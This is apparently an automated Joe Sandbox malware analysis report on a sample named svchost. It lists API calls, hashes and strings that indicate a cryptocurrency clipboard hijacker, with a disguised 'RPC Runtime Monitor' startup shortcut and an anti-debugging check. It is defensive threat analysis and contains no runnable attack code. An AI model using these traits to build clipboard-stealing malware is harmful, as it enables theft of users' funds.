                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DestroyMessageWindow$ClipboardFormatListener_rand$DispatchErrorLastMutexObjectPeekReleaseRemoveSingleSleepTranslateWait
                                      • String ID:
                                      • API String ID: 2075554847-0
                                      • Opcode ID: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction ID: 4f33caf6bca9ddad8697e74e62c9060a71084bf4d8c7d1bdb57def999465fb8c
                                      • Opcode Fuzzy Hash: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction Fuzzy Hash: 92515BB0A00604DBDB20DFA4DC88BAFBBB4FB54714F14463AE506A62E0D7799905CF29
                                      APIs
                                      • KillTimer.USER32(?,57AE0D82), ref: 00405839
                                      • PostQuitMessage.USER32(00000000), ref: 00405863
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0040587D
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: KillMessagePostProcQuitTimerWindow
                                      • String ID:
                                      • API String ID: 2965130154-0
                                      • Opcode ID: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction ID: 28f21435e46fd2e830124e72743dc58a12090b41100468ac95c48544234bd2ff
                                      • Opcode Fuzzy Hash: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction Fuzzy Hash: 58518435A00548DFDB24EF60DC48B9B77B4FB04354F4486BAE80AA62D0C7789A95CF59
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0040F928
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F93D
                                      • UnhandledExceptionFilter.KERNEL32(0041A294), ref: 0040F948
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040F964
                                      • TerminateProcess.KERNEL32(00000000), ref: 0040F96B
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction ID: 88087e6288b79e792aea48af548dc1751c073badf06254871cafe7bc60af0824
                                      • Opcode Fuzzy Hash: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction Fuzzy Hash: C221D6B4A02308DFD720EF65F8496957BE0FB48304F90903AE50993663D7B45596CF9D

                                      Control-flow Graph
                                      control_flow_graph 410 410689-41069b GetModuleHandleW 411 4106a6-4106ee GetProcAddress * 4 410->411 412 41069d-4106a5 call 4103d6 410->412 414 4106f0-4106f7 411->414 415 410706-410725 411->415 414->415 418 4106f9-410700 414->418 416 41072a-410738 TlsAlloc 415->416 420 4107ff 416->420 421 41073e-410749 TlsSetValue 416->421 418->415 419 410702-410704 418->419 419->415 419->416 423 410801-410803 420->423 421->420 422 41074f-410795 call 411471 EncodePointer * 4 call 412581 421->422 428 410797-4107b4 DecodePointer 422->428 429 4107fa call 4103d6 422->429 428->429 432 4107b6-4107c8 call 412773 428->432 429->420 432->429 435 4107ca-4107dd DecodePointer 432->435 435->429 437 4107df-4107f8 call 410413 GetCurrentThreadId 435->437 437->423
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040F780), ref: 00410691
                                      • __mtterm.LIBCMT ref: 0041069D
                                        • Part of subcall function 004103D6: DecodePointer.KERNEL32(00000005,004107FF,?,0040F780), ref: 004103E7
                                        • Part of subcall function 004103D6: TlsFree.KERNEL32(0000000C,004107FF,?,0040F780), ref: 00410401
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,004107FF,?,0040F780), ref: 004125E8
                                        • Part of subcall function 004103D6: _free.LIBCMT ref: 004125EB
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(0000000C,76EF5810,?,004107FF,?,0040F780), ref: 00412612
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004106B3
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004106C0
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004106CD
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004106DA
                                      • TlsAlloc.KERNEL32(?,0040F780), ref: 0041072A
                                      • TlsSetValue.KERNEL32(00000000,?,0040F780), ref: 00410745
                                      • __init_pointers.LIBCMT ref: 0041074F
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410760
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041076D
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041077A
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410787
                                      • DecodePointer.KERNEL32(0041055A,?,0040F780), ref: 004107A8
                                      • __calloc_crt.LIBCMT ref: 004107BD
                                      • DecodePointer.KERNEL32(00000000,?,0040F780), ref: 004107D7
                                      • GetCurrentThreadId.KERNEL32 ref: 004107E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction ID: 40795ae181cca19bb6142b5e762f73122f3cfe54ebf09a24129c268063ec4741
                                      • Opcode Fuzzy Hash: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction Fuzzy Hash: 0B319A30A01210ABC731AFB5AC156967EE0EB44725B504537E928C32F1D7B8A5D2CF5D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: *07=JWdp$7$=$J$W$bitcoincash:$d$p$|
                                      • API String ID: 909875538-3576240675
                                      • Opcode ID: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction ID: ecf531c9375a07a423a8c1e4a6a4c70633f4976ddfcbcebe6c6e4547d44ee2d2
                                      • Opcode Fuzzy Hash: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction Fuzzy Hash: 29A17170A082A8DADF25CB25C8507EEBBB1AF42304F1480DAD48E7B382C6795F94DF55
                                      APIs
                                      • MessageBoxA.USER32(00000000,?,00000000,?), ref: 00401B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Configuration loaded from $INVALID ADDRESSES:$No config info found$VALID ADDRESSES:$k;B9=8prHYVXTHk87/20Hn25.Hz.98;=
                                      • API String ID: 2030045667-921656899
                                      • Opcode ID: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction ID: f26b0750d2dd7497bc4d0c1e5d1dca22003d29cf30daf5b63e4976072f097509
                                      • Opcode Fuzzy Hash: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction Fuzzy Hash: C1912970E442889FDB14CFA8C891BEDBBB1BF45308F14819AD1597B386C7746886CF59
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041E020,00000008,0041051B,00000000,00000000,?,?,00410B26,00410CE1,?,?,0040E795,?,?,00401568), ref: 00410424
                                      • __lock.LIBCMT ref: 00410458
                                        • Part of subcall function 004126FB: __mtinitlocknum.LIBCMT ref: 00412711
                                        • Part of subcall function 004126FB: __amsg_exit.LIBCMT ref: 0041271D
                                        • Part of subcall function 004126FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041045D,0000000D), ref: 00412725
                                      • InterlockedIncrement.KERNEL32(?), ref: 00410465
                                      • __lock.LIBCMT ref: 00410479
                                      • ___addlocaleref.LIBCMT ref: 00410497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction ID: 7fb989b1ea40e66e3d5707d5b0016f419c3c6570b292f4f1006bf44dac2eb610
                                      • Opcode Fuzzy Hash: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction Fuzzy Hash: CB018E71440B00ABD720DF66D905789FBE0BF08328F10890FE599922A1CBF8A9C4CB19
                                      APIs
                                      • __getptd.LIBCMT ref: 00415C45
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415C56
                                      • __getptd.LIBCMT ref: 00415C64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      • Opcode ID: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction ID: 68d6bacec3ee04245c6d6a34250a27a57659d45bc5a15925c67b47308b05fb02
                                      • Opcode Fuzzy Hash: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction Fuzzy Hash: 9FE0ED305106049ED710EB65D08ABE93695BB84318F6914A7E41DCB322E77C99D0498A
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000000,EED2DB5A,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D507
                                      • CoCreateInstance.OLE32(0041A230,00000000,00000001,0041A220,?,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D535
                                      • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D593
                                      • _wcsrchr.LIBCMT ref: 0040D5BF
                                      • SetFileAttributesW.KERNEL32(00000000,00000007,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D63F
                                      • CoUninitialize.OLE32(?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D653
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$CreateInitializeInstanceUninitialize_wcsrchr
                                      • String ID:
                                      • API String ID: 1064171213-0
                                      • Opcode ID: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction ID: 4845e592d9404c25205a35a8fd2c5cc2ee3bc669e6c60dc710010856fdd0759c
                                      • Opcode Fuzzy Hash: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction Fuzzy Hash: 41614771A00208AFDB14DF98CC84BEEB7B5BB4C314F148169E509A72A0C778A985CF68
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040E264
                                      • GetClassInfoA.USER32(00000000,00000000,?), ref: 0040E28B
                                      • RegisterClassA.USER32(00000000), ref: 0040E29F
                                      • CreateWindowExA.USER32(00000000,00000000,0041CCD4,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0040E2F8
                                      • ShowWindow.USER32(00000000,00000000), ref: 0040E30D
                                      • UnregisterClassA.USER32(00000000,00000000), ref: 0040E325
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Class$Window$CreateHandleInfoModuleRegisterShowUnregister
                                      • String ID:
                                      • API String ID: 801957319-0
                                      • Opcode ID: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction ID: a965deb00f86eced1c550541a2bb8782c69ddf198977c8bb291b1a06dc78ae28
                                      • Opcode Fuzzy Hash: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction Fuzzy Hash: 3B411B74D04209EFDB50CFA9D844BEEBBB5BB48300F14846EE919B7280D7789961CF69
                                      APIs
                                      • __CreateFrameInfo.LIBCMT ref: 00415EF9
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414765
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414773
                                      • __getptd.LIBCMT ref: 00415F03
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415F11
                                      • __getptd.LIBCMT ref: 00415F1F
                                      • __getptd.LIBCMT ref: 00415F2A
                                      • _CallCatchBlock2.LIBCMT ref: 00415F50
                                        • Part of subcall function 004147FC: __CallSettingFrame@12.LIBCMT ref: 00414848
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416014
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                      • String ID:
                                      • API String ID: 1602911419-0
                                      • Opcode ID: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction ID: 8ee7e9482143d68d58532e94b41f02c712f5e5267d1978e0f484a2f57dee007e
                                      • Opcode Fuzzy Hash: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction Fuzzy Hash: A311EC71D00209EFDB00EFA5D545ADEB7B1FF08318F10806AF814E7251EB7899959F54
                                      APIs
                                      • __getptd.LIBCMT ref: 0040FBA2
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __amsg_exit.LIBCMT ref: 0040FBC2
                                      • __lock.LIBCMT ref: 0040FBD2
                                      • InterlockedDecrement.KERNEL32(?), ref: 0040FBEF
                                      • _free.LIBCMT ref: 0040FC02
                                      • InterlockedIncrement.KERNEL32(024020C0), ref: 0040FC1A
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction ID: 04197ae65fda5c63c56dbd3dc8e75b233e0ac2e231bfe1491633d9689cd981ba
                                      • Opcode Fuzzy Hash: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction Fuzzy Hash: DF01CB31941626ABD720AB6994067CA77A0BB04714F14403BE804B36D0D77CB98A8FCE
                                      APIs
                                      • _memset.LIBCMT ref: 0040D722
                                      • SHGetFolderPathW.SHELL32(00000000,00000018,00000000,00000000,?), ref: 0040D780
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: FolderPath_memset
                                      • String ID: --run$RPC Runtime Monitor$\rpcmon.lnk
                                      • API String ID: 3318179493-935953821
                                      • Opcode ID: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction ID: 1050105f52961729ecfe266b6ed7309ec72b43aeb9dcbb43f9ef2f744927e597
                                      • Opcode Fuzzy Hash: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction Fuzzy Hash: 5B21EA74D4031CABDB20DFA0DC4ABE973B4AB14304F5045EEE819A72C1E7789A89DF59
                                      APIs
                                      • ___BuildCatchObject.LIBCMT ref: 00416291
                                        • Part of subcall function 004161EC: ___BuildCatchObjectHelper.LIBCMT ref: 00416222
                                      • _UnwindNestedFrames.LIBCMT ref: 004162A8
                                      • ___FrameUnwindToState.LIBCMT ref: 004162B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                      • String ID: csm$csm
                                      • API String ID: 2163707966-3733052814
                                      • Opcode ID: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction ID: 4da0fed9b642d527bb6294f99e7a8c099849be82aa3d1ad59cbd6958426e80c5
                                      • Opcode Fuzzy Hash: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction Fuzzy Hash: EB014631400609BBDF126F52CC46EEB3F6AEF48354F01801ABC1814121D77AD9B1DBA8
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040119B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004011BC
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 004011D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 4190356694-3301033669
                                      • Opcode ID: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction ID: f3a3b2490c05c86b39bee9860363372222596c46706d0865df52a15b71608fee
                                      • Opcode Fuzzy Hash: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction Fuzzy Hash: E00186B0D40208BBDF149FE0DC4DBDD7BB89B08349F104076E601B62E1D6785754DB5A
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040121B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040123C
                                      • GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 00401255
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 4190356694-3301033669
                                      • Opcode ID: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction ID: 283a584ac4493401d37b65e144df0ac759d1c493dcd86ba3b9ae389d4cc3117d
                                      • Opcode Fuzzy Hash: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
